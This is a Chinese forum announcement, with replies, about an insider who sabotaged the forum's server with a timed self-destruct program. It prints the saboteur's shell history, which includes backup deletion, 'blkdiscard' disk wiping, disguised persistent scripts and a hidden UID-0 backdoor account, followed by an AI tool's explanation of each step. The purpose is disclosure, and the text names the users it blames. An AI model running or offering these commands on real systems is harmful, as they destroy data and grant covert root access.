关于论坛遭受内部人员攻击的公告
尊敬的各位用户:很抱歉地通知大家,个别管理团队成员因为管理团队内部纠纷,在论坛服务器中植入了定时自毁程序。本人在昨日晚上巡视服务器时发现了异常,立即备份了所有数据,并尽力采取必要的措施。但不幸的是,破坏者植入的自毁程序仍于今日夜间发作,销毁了网站数据。所幸管理团队利用昨日备份的数据,成功将论坛恢复至昨日晚间的状态,没有出现大规模的数据丢失。昨日19时前的数据全部得以保留。
对于这次意外事件,本人和管理团队感到十分心痛。管理团队在原地铁e族关闭、新站建立初期就早已决定绝不走地铁族、原地铁e族的老路,将用户数据视若珍宝,用实际行动回应广大用户的辛苦付出。然而,破坏者只因管理团队存在内部矛盾,就公然在服务器植入自毁程序,全然不顾论坛的稳定运营,妄图在服务器自毁后将网站损毁的罪责推到本人身上,以吸引舆论攻击本人。破坏者的行为完全背离了其建立地铁e族论坛的初衷,也违背了其之前对用户许下的的庄严承诺,管理团队对破坏者的行为表示强烈谴责!
尽管管理团队采取了一定措施防范今后可能出现的攻击行为,但破坏者今后仍可能继续攻击论坛服务器。论坛服务器亦有可能再次因遭受攻击导致停机或丢失少量数据,敬请各位用户谅解。管理团队建议各位用户及时修改账号密码,以防账号被盗。
附1:破坏者执行的用于实施破坏的代码(部分)
152vim php-fpm.conf
153vim php-fpm.conf
154cd /root
155ls
156rm database20260526_1346.txt
157rm *
158ls
159reboot
160systemctl stop my-nginx
161systemctl stop php-fpm
162systemctl restart mariadb
163cd /var/www
164ls
165mysqldump -u root -p discuz > database_20260531_1310.txt
166ls
1677z a web_20260531_1310.7z discuz
168rm database_20260531_1310.txt
169systemctl restart php-fpm
170systemctl restart my-nginx
171rm web_20260531_1310.7z
172ls
173cd discuz
174ls
175cd ..
176cd /
177ls
178cd bin
179ls -al
180vim zstdoo
181chown root:root zstdoo
182chmod 777 zstdoo
183zstdoo
184cd /dev/block
185ls -al
186blkdiscard
187cd /bin
188vim zstdoo
189sleep 15h
190sleep --help
191vim zstdv2
192ls -al /dev/block
193ls -al /dev
194vim zstdv2
195chmod 777 zstdv2
196vim zstdoo
197ls -al /dev/block
198vim zstdoo
199vim zstdv2
200ls -al
201cd /etc/systemd/system/
202vim zstd_compressor.service
203cd /bin
204vim zstdv2
205vim zstdv2
206vim zstdoo
207vim zstdv0
208cat zstdv0
209chmod 777 zstdv0
210cd ~
211zstdv0
212nohup zstdv0
213ls
214rm nohup.out
215nohup zstdv0 > /dev/null 2>&1 & echo $!
216ps -A | grep 28864
217kill 28864
218ps -A
219kill 28865
220systemctl darmon-reload
221systemctl daemon-reload
222systemctl is_enabled zstd_compressor
223systemctl is-enabled zstd_compressor
224vim /bin/zstdv2
225ps -A
226kill 28952
227clear
228du
229pwd
230useradd -o -u 0 -g 0 -m -s /bin/bash snihty888
231passwd snihty888 附2:AI工具Gimini对上述代码的分析报告
这段历史命令记录了一个从常规运维演变为可疑后门植入与系统破坏测试的完整过程。
我们可以将这 80 条命令划分为以下五个阶段来详细解析:
第一阶段:常规的 Web 站点维护与清理 (152 - 159)
操作: 检查了 php-fpm.conf 配置文件,随后进入 /root 目录,删除了旧的数据库备份文件 database20260526_1346.txt,并通过 rm * 清空了该目录下的所有文件。
结果: 清理了 root 用户的家目录空间,并执行了 reboot 重启系统以应用更改。
第二阶段:Discuz! 论坛的数据备份与测试 (160 - 177)
操作: 1. 停止了 Nginx 和 PHP-FPM 服务,重启了 MariaDB 数据库。
2. 进入 /var/www 目录,使用 mysqldump 导出了名为 discuz 的数据库。
3. 使用 7z 将论坛程序目录打包压缩为 web_20260531_1310.7z。
反常行为: 在备份完成后,该用户紧接着就把刚刚生成的数据库备份和网页备份打包文件全部删除了(rm ...),随后重新启动了 Web 服务。这通常表明他们只是在测试备份流程,或者在本地/临时转移了数据。
第三阶段:高危破坏性命令测试与可疑脚本编写 (178 - 200)
操作: 1. 进入系统核心二进制目录 /bin,创建并编辑了一个名为 zstdoo 的文件,将其权限赋为 777(全所有人可读写执行)。
2. 切换到磁盘设备目录 /dev/block,并执行了 blkdiscard 命令。
高危警告: blkdiscard 是一个极度危险的命令,它会直接向固态硬盘或块设备发送 SSD TRIM 指令,瞬间抹除块设备上的所有数据且几乎无法恢复。
3. 随后,该用户开始频繁修改和迭代一系列以 zstd 命名的自定义脚本(包括 zstdoo、zstdv2 等)。虽然 zstd 本身是一种大名鼎鼎的现代压缩算法,但这里的用法显然是借用了其名称作为伪装。
第四阶段:配置持久化与后台静默运行 (201 - 229)
操作:
进入系统服务目录 /etc/systemd/system/,创建了一个名为 zstd_compressor.service 的系统服务。
试图通过 systemctl daemon-reload 和 systemctl is-enabled 将该服务注册为系统自启动服务(再次利用“压缩工具”的名称进行伪装)。
在测试服务时,可能遇到了问题,于是转而使用 nohup zstdv0 > /dev/null 2>&1 & 强行将脚本置于绝对静默的后台运行(不产生任何日志输出)。
随后通过 ps -A 和 kill 命令,对产生的进程 PID 进行调试和清理。
第五阶段:植入 Root 级别后门账号 (230 - 231)
操作: ```bash
useradd -o -u 0 -g 0 -m -s /bin/bash snihty888
passwd snihty888
安全事件: 这是典型的黑客或留后门行为。-u 0 和 -o 参数允许创建一个人为指定的、拥有最高 Root 权限的超级用户,并将其命名为 snihty888。这意味着即使真正的 root 密码被修改,攻击者仍可以通过这个隐藏的影子账号随时远程登录并完全控制这台服务器。
总结
如果这段命令不是你本人在高度隔离的沙箱或测试机中进行防御性演练,那么该服务器极有可能已经遭受严重的恶意入侵。攻击者不仅测试了能够彻底摧毁磁盘数据的命令,还在系统中成功留下了常驻后台的恶意脚本和具备最高权限的后门账号。
感谢论坛管理团队的努力工作,那么快就恢复正常啦{:6_171:}{:6_148:} 加油!希望数据能一直保存下去 可以报警的程度了? 破坏者是谁啊,这个吊毛 所以破坏者是谁呢? 经初步调查,本人只将服务器平台密码交给过@TMS19666,并只授权其一个人对服务器进行维护 。因此无论破坏者为何人,@TMS19666 均负有不可推卸的责任。
另外,@snihty 在没有任何证据的情况下反过来污蔑本次事故系本人自导自演的一场戏,目的在于把攻击服务器的责任嫁祸给@snihty 和@TMS19666 。其说法明显与客观事实不符。本人加入论坛管理团队已经数年了,自认为没做什么对不起大家的事情,更不可能亲手毁掉大家苦心经营的心血!至于破坏者究竟是谁,真相究竟如何,我相信人在做,天在看!
感谢各位坛友对此事的关心。
@657657 @lake 阳光彩虹小白猹 发表于 2026-6-3 12:32
经初步调查,本人只将服务器平台密码交给过@TMS19666,并只授权其一个人对服务器进行维护 。因此无论破坏者 ...
你不要拿炸服务器来威胁全体用户就行 一百歲唔死都有新聞睇
从用户的角度劝诫二位前版主,管理团队内部的矛盾是你们自己的事情。很大一部分用户是不关心你们之间的琐事的。你们尤其不应该因为私人恩怨而销毁论坛数据。论坛数据是大家的,不是你管理的私有财产。
你俩没被永久封号就偷着乐呵吧。从我的角度看,你俩要和coac一起钉在历史的耻辱柱上。 在恶意程序发作当天,@TMS19666 即退出与地铁e族有关的全部QQ群聊,并注销了管理团队内部沟通所使用的加密聊天软件账号,全程未对事件有任何回应或者解释。
页:
[1]